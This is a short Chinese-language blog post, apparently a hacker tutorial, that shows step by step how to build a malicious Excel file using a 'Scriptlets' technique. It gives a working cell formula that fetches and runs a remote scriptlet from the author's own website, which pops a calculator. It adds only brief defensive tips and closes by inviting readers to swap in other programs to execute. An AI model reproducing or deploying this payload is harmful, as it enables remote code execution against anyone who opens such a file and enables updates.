返回目录:office365
微软的Office办公软件今年出了三个很有影响力的漏洞,前两个分别是CVE-2017-11882和DDE漏洞,我本头条号上也都有过文章讲过如何做样本和做防范。文章地址分别是《微软隐藏17年的Office代码执行漏洞,海阳顶端黑客让你明明白白》、《人人都会的黑客DOC文档制作,一分钟详解Office的DDE漏洞》。
前几天老外抓了一个Excel样本,暴出了一种Scriptlets攻击方式,是一种新的、未知的攻击技术,算是给黑客们送上了一份圣诞礼物。这个恶意的Excel文件也非常好制作,海阳顶端黑客给你讲明白。
一、写一段执行计算器的Scriptlets代码,
代码在这,因为头条老吞代码里的斜杠,所以我抓了下图。
代码我已经传到我自己的网站了,代码地址在https://www.haiyangtop.cn/1.xml,直接打开显示错误,鼠标右键点击就能看到源码了。
二、一分钟就能制作出这个恶意的xlsx文件。
我用的是Office2010做的测试,这个漏洞是通杀所有版本的Excel的。
(1)在电脑桌面,鼠标右键新建一个Microsoft excel工作表。
(2)打开新建的excel文件,在单元格中插入以下代码,然后保存就可以了:
=Package|'script:https://haiyangtop.cn/1.xml'!''''
三、测试
第一次打开这个excel文件,默认禁止了外部链接。当启用外部链接后才会提示是否更新 点击更新就会触发恶意代码,计算器就会弹出来了。
四、我们如何防范这种新式的黑客攻击?
通过制作你就明白了,如果有这样的excel文件,不要点击启用外部链接,不要点击更新。如果实在忍不住.,安全大法就是用虚拟机打开。如果你有心学黑客技术,想把计算器换成别的程序执行,我头条里有好多这样的文章,关注我翻看吧,里边的黑客技术不会让你失望的。